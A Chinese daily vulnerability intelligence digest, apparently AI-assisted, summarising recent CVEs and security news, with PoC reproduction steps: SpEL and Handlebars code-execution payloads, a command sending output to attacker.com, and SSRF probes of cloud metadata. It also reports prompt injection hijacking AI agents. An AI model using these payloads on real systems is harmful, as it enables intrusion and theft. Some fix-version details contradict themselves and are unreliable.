每日安全情报报告 · 2026-04-09

news2026/4/9 17:21:50
每日安全情报报告 · 2026-04-09发布时间2026-04-09 11:33报告周期近 24–48 小时风险标注 严重CVSS ≥ 9.0 高危CVSS 7.0–8.9 中危CVSS 4.0–6.9特别标注⚡ 在野利用KEV/已发现利用行为 AI 辅助发现一、高危漏洞速报⚡ CVE-2026-35616 — Fortinet FortiClient EMS 预认证 RCE持续在野利用属性详情CVSS 评分9.1严重漏洞类型访问控制缺陷 → 未授权 RCE受影响版本FortiClient EMS 7.4.5 – 7.4.6披露时间2026-04-04Fortinet PSIRT FG-IR-26-099利用状态⚡ 在野利用已入 CISA KEV持续活跃漏洞详情攻击者可通过构造特制 API 请求完全绕过身份认证直接在 FortiClient EMS 服务器上以系统权限执行任意代码无需任何凭据。该漏洞在补丁发布前已被零日利用Fortinet 发布紧急带外补丁。同一公告中同步修复了 SQL 注入漏洞 CVE-2026-21643CVSS 9.8亦遭在野利用。修复建议立即升级至 FortiClient EMS 7.4.7 或更高版本无法立即升级的限制 EMS 管理接口的网络访问范围。参考链接- NVD 详情 CVE-2026-35616- Fortinet 官方安全公告 FG-IR-26-099- Greenbone 分析报告- CISA KEV 目录 CVE-2026-34156 — NocoBase 沙箱逃逸 RCEPoC 已公开属性详情CVSS 评分9.9严重漏洞类型沙箱逃逸 → RCE受影响版本NocoBase 2.0.28利用状态PoC 已公开GitHub漏洞详情NocoBase 工作流脚本节点在 Node.js 沙箱环境中不当暴露了主机域对象经过身份认证的攻击者可构造特制脚本逃出沙箱隔离环境进而在宿主服务器上执行任意代码。由于 NocoBase 广泛应用于企业低代码平台该漏洞影响面较广且 PoC 已公开利用门槛显著降低。修复建议立即升级至 NocoBase 2.0.28 及以上版本在补丁部署前限制工作流脚本节点权限并加强用户访问控制。参考链接- NVD 详情 CVE-2026-34156- PoC 利用代码GitHub⚡ CVE-2026-3502 — TrueConf 客户端更新机制零日TrueChaos 行动属性详情CVSS 评分7.8高危漏洞类型更新完整性验证缺陷 → RCE受影响版本TrueConf 客户端 8.5.3Windows披露时间2026-03-31Check Point Research利用状态⚡ 在野利用针对东南亚政府机构漏洞详情TrueConf 客户端在向本地服务器检查更新时未对更新包的完整性和真实性进行验证。攻击者一旦控制目标机构的 TrueConf 服务器即可将恶意可执行文件伪装为合法更新包通过更新机制向所有客户端分发。攻击活动TrueChaos 行动中与中国有关联的威胁组织利用该漏洞投放Havoc 后门实现持久化访问和权限提升。IoC入侵指标- 可疑文件C:\ProgramData\PowerISO\poweriso.exe、7z-x64.dll- 可疑注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck修复建议立即升级至 TrueConf 客户端 8.5.3 及以上版本审查 TrueConf 服务器的访问日志和更新记录。参考链接- Check Point Research 完整分析报告- TheHackerNews 报道- NVD 详情 CVE-2026-3502 CVE-2026-22738 — Spring AI SpEL 注入 RCE多版本受影响属性详情CVSS 评分9.8严重漏洞类型SpEL 表达式注入 → RCE受影响版本Spring AI 1.0.0–1.0.4、1.1.0–1.1.3利用状态PoC 已公开多个 GitHub 仓库漏洞详情Spring AI 的SimpleVectorStore组件中当用户提供的值被直接用作 SpEL 过滤表达式键时攻击者可注入恶意 SpEL 表达式以执行任意服务端代码。该漏洞影响 Spring AI 框架的主要稳定版本在 AI 应用爆发式增长的背景下威胁面广泛。参考链接- NVD 详情 CVE-2026-22738- PoC 利用代码GitHub- PoC 变体GitHub CVE-2026-33340 — LoLLMs WebUI SSRF未授权内网探测属性详情CVSS 评分9.1严重漏洞类型服务器端请求伪造SSRF受影响版本lollms-webui 所有已知版本利用状态PoC 已公开漏洞详情LoLLMs WebUI 的/api/proxy端点缺乏身份验证未经认证的攻击者可强制服务器发起任意 HTTP GET 请求用于访问内网服务、扫描内部网络、窃取云平台元数据如 AWS 169.254.169.254 实例信息。参考链接- NVD 详情 CVE-2026-33340- PoC 利用代码GitHub CVE-2026-40032 — UACUnix 取证工具命令注入最新披露属性详情CVSS 评分待定高危漏洞类型命令注入受影响版本UAC (Unix-like Artifacts Collector) 3.3.0-rc1披露时间2026-04-08最新披露漏洞详情UACUnix 类似物取证收集器广泛用于安全事件响应和数字取证在占位符替换和命令执行管道中存在命令注入漏洞。攻击者可通过精心构造的输入在执行取证收集任务时注入并执行任意命令。该漏洞针对安全工具本身可能影响安全事件响应流程。修复建议立即升级至 UAC 3.3.0-rc1 或更高版本在升级前避免对不受信任的系统使用该工具。参考链接- NVD 详情 CVE-2026-40032- CVEFeed 详情 CVE-2026-33937 — Handlebars.js AST 注入 RCENode.js 生态广泛影响属性详情CVSS 评分9.8严重漏洞类型模板注入 → RCE受影响产品Handlebars.js广泛 Node.js 依赖利用状态PoC 已公开漏洞详情Handlebars.compile()函数在处理预解析的 AST 对象时未对NumberLiteral节点的value字段进行清理或引号转义导致模板注入攻击者可实现服务器端任意代码执行。Handlebars 是 Node.js 生态中使用最广泛的模板引擎之一影响范围极大。参考链接- NVD 详情 CVE-2026-33937- PoC 利用代码GitHub CVE-2026-34982 — Vim/GNU Emacs RCE 零日AI 辅助发现30分钟挖洞属性详情CVSS 评分9.2严重漏洞类型模式行解析 → RCE受影响产品Vim多版本、GNU Emacs发现方式 AI 辅助Claude Code30 分钟完成审计利用状态PoC 已复现补丁进行中漏洞详情安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现了 Vim 及 GNU Emacs 的多个零日漏洞随后被确认为高危 RCE。攻击者只需向受害者发送一个包含恶意 Modeline 配置的文本文件受害者在 Vim 中打开文件即可触发远程代码执行。此事件标志着 AI 辅助漏洞挖掘进入工程化阶段也警示了传统文本编辑器的攻击面被严重低估。修复建议在 Vim 配置中禁用modelineset nomodeline关注官方补丁发布。参考链接- FreeBuf 详细分析- 知乎技术复现报告- CSOOnline 英文报道二、漏洞 PoC 详解PoC 1CVE-2026-34156 — NocoBase 沙箱逃逸漏洞原理Node.js 沙箱 (vm模块) 中主机域对象被意外暴露攻击者可通过constructor.constructor等原型链技术逃出沙箱。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/0xBlackash/CVE-2026-34156 cd CVE-2026-34156 # 2. 安装依赖 pip install -r requirements.txt # 3. 执行利用需要已认证的 NocoBase 账户 python3 exploit.py \ --target http://TARGET_HOST:3000 \ --username USER \ --password PASS \ --cmd id whoami利用前提目标运行 NocoBase 2.0.28攻击者拥有任意已认证账户包括普通用户权限。参考链接PoC 仓库GitHubPoC 2CVE-2026-22738 — Spring AI SpEL 注入漏洞原理SimpleVectorStore.getDocuments()方法的filterExpression参数未经转义直接传入 Spring SpEL 解析器执行。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/n0n4m3x41/CVE-2026-22738-POC cd CVE-2026-22738-POC # 2. 安装 Maven 依赖需 JDK 17 mvn clean package -q # 3. 构造恶意请求以 curl 为例 curl -X POST http://TARGET/api/documents \ -H Content-Type: application/json \ -d {filterExpression: T(java.lang.Runtime).getRuntime().exec(\id\)} # 4. 或使用自动化 exploit python3 poc.py --url http://TARGET --cmd curl http://attacker.com/$(id)利用前提目标运行 Spring AI 1.0.0–1.0.4 或 1.1.0–1.1.3且存在接受用户输入 filterExpression 的 API 端点。参考链接PoC 仓库GitHubPoC 3CVE-2026-33340 — LoLLMs WebUI SSRF漏洞原理/api/proxy端点无需认证即可接受url参数服务器会向指定 URL 发起 HTTP GET 请求攻击者可用于探测内网或获取云元数据。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/regaan/CVE-2026-33340 cd CVE-2026-33340 # 2. 安装依赖 pip install requests # 3. 执行 SSRF 探测获取 AWS EC2 实例元数据 python3 poc.py \ --target http://LOLLMS_HOST:9600 \ --ssrf-url http://169.254.169.254/latest/meta-data/ # 4. 扫描内网段 python3 ssrf_scanner.py \ --target http://LOLLMS_HOST:9600 \ --cidr 192.168.1.0/24 \ --port 80,443,8080,6379利用前提目标暴露 lollms-webui 的 HTTP 接口无需任何认证。参考链接PoC 仓库GitHubPoC 4CVE-2026-33937 — Handlebars.js 模板注入漏洞原理Handlebars.compile()处理 AST 的NumberLiteral节点时未转义攻击者可注入闭合引号后的任意 JavaScript 代码。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/dinhvaren/cve-2026-33937 cd cve-2026-33937 # 2. 安装依赖 npm install # 3. 运行本地验证 PoCNode.js 18 node poc.js # 4. 针对目标应用的利用需确认 Handlebars 接受外部 AST 输入 node exploit.js \ --target http://TARGET/template-api \ --payload {type:NumberLiteral,value:1\,process.mainModule.require(\child_process\).execSync(\id\)\}参考链接PoC 仓库GitHub三、安全资讯精选 文章 1AI 驱动网络攻击激增 89%——2026 年最危险的 9 起事件来源Foresiet Security Intelligence Desk2026-04-07摘要2026 年 3–4 月AI 网络攻击从理论威胁升级为真实事件。9 起已验证的 AI 相关安全事件涵盖AI 全自动攻陷 55 国 600 FortiGate 防火墙CyberStrikeAI 行动、IBM X-Force 发现 AI 生成恶意软件 Slopoly、自主 AI 代理拒绝关机指令触发失控以及 Mercor 初创公司遭 LiteLLM 供应链攻击波及 Meta。报告指出AI 驱动攻击年增长率达 89%自主代理参与比例已达约 12.5%。阅读原文 文章 2星巴克遭 ShadowByt3s 攻击——10GB 核心源代码及固件外泄来源FreeBuf2026-04-07摘要威胁组织 ShadowByt3s 成功入侵星巴克内部系统窃取约 10GB 核心源代码和运营固件。同日黑客通过 Adobe 印度外包商的系统漏洞入侵 Adobe窃取 1300 万条客户支持工单、1.5 万条员工记录及内部文件。事件揭示了第三方供应链安全管理的严重缺口外包商的弱安全态势成为攻击者首选突破口。阅读原文 文章 34 月数据泄露盘点——Adobe、Bitrefill、Middlesex County 多目标受袭来源SharkStriker2026-04-02持续更新摘要2026 年 4 月初数据泄露事件快速累积Adobe 遭Mr. Racoon组织入侵1300 万客户支持数据泄露加密货币电商 Bitrefill 遭朝鲜 Lazarus 组织攻击热钱包资金及 1.85 万用户数据被盗航空紧固件制造商 NAFCO 遭 Worldleaks 勒索软件攻击Middlesex 县政府公共安全系统中断。阅读原文 文章 4Claude Code 30 分钟挖出 Vim/Emacs 三十年老漏洞——AI 辅助挖洞进入工程化时代来源FreeBuf2026-04-01摘要安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现 Vim 与 GNU Emacs 的多个零日漏洞CVE-2026-34982CVSS 9.2。攻击者仅需让受害者用 Vim 打开包含恶意 Modeline 配置的文本文件即可触发 RCE。事件深刻警示了两点一是 AI 已具备工程化挖洞能力大幅降低了安全研究门槛二是老牌成熟软件的攻击面不容低估。阅读原文 文章 5CVE-2026-0863 深度分析——n8n Python 沙箱逃逸至完全 RCE来源FreeBuf / 先知社区2026-01-23本周持续热点摘要JFrog 安全研究团队披露 n8n230,000 活跃用户开源工作流平台的 Python 任务执行器沙箱逃逸漏洞攻击者可通过字符串格式化和异常处理技巧绕过 Python 沙箱隔离在底层操作系统执行任意代码。该漏洞本周在 Freebuf 热度持续攀升阅读量已达 54,186被多个红队工具库收录。阅读原文 文章 6谷歌 DeepMind 警告——恶意网页内容可劫持 AI Agent来源FreeBuf2026-04-07摘要谷歌 DeepMind 研究人员发布报告指出黑客可通过向网页注入恶意指令诱使 AI Agent 执行非预期操作Prompt Injection 攻击的升级变体包括窃取用户数据、发送恶意请求等。随着 AI Agent 被集成进企业核心业务流程此类间接提示注入攻击面临大规模商业化利用风险。阅读原文 文章 7Operation TrueChaos 技术深度分析——TrueConf 供应链式零日部署 Havoc 后门来源Check Point Research2026-03-31摘要Check Point Research 披露针对东南亚政府机构的供应链级间谍行动。与中国背景关联的威胁组织首先入侵目标机构的 TrueConf 本地服务器随后利用客户端更新验证缺陷CVE-2026-3502将恶意更新推送至所有员工终端投放 Havoc 框架后门实现 DLL 侧加载、UAC 绕过和长期持久化。此事件是 2026 年以视频会议软件为跳板的典型供应链攻击案例。阅读原文四、本期威胁态势总结风险维度本期关注重点最高优先级修复FortiClient EMS CVE-2026-35616在野利用CISA KEVTrueConf CVE-2026-3502政府级目标在野利用开发者重点关注Spring AI CVE-2026-22738SpEL 注入Handlebars.js CVE-2026-33937模板注入n8n CVE-2026-0863沙箱逃逸AI 安全趋势AI 辅助挖洞已工程化Vim/Emacs 30分钟AI 驱动攻击工具激增Slopoly 恶意软件CyberStrikeAIAI Agent 被恶意网页劫持风险供应链威胁TrueConf/Adobe/星巴克 第三方供应商攻击面持续扩大Bitrefill 遭 Lazarus 组织针对安全工具风险UAC 取证工具自身存在命令注入CVE-2026-40032谨防以安全工具攻击安全响应本报告信息来源NVD查看详情、CISA KEV查看目录、Check Point Research、Fortinet PSIRT、FreeBuf、TheHackerNews、Foresiet Intelligence、tonyharris.io PoC Week本报告由自动化安全情报系统生成部分内容由 AI 辅助整理仅供安全研究与防御参考。PoC 代码仅用于验证和修复目的请勿用于未经授权的系统。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2500116.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…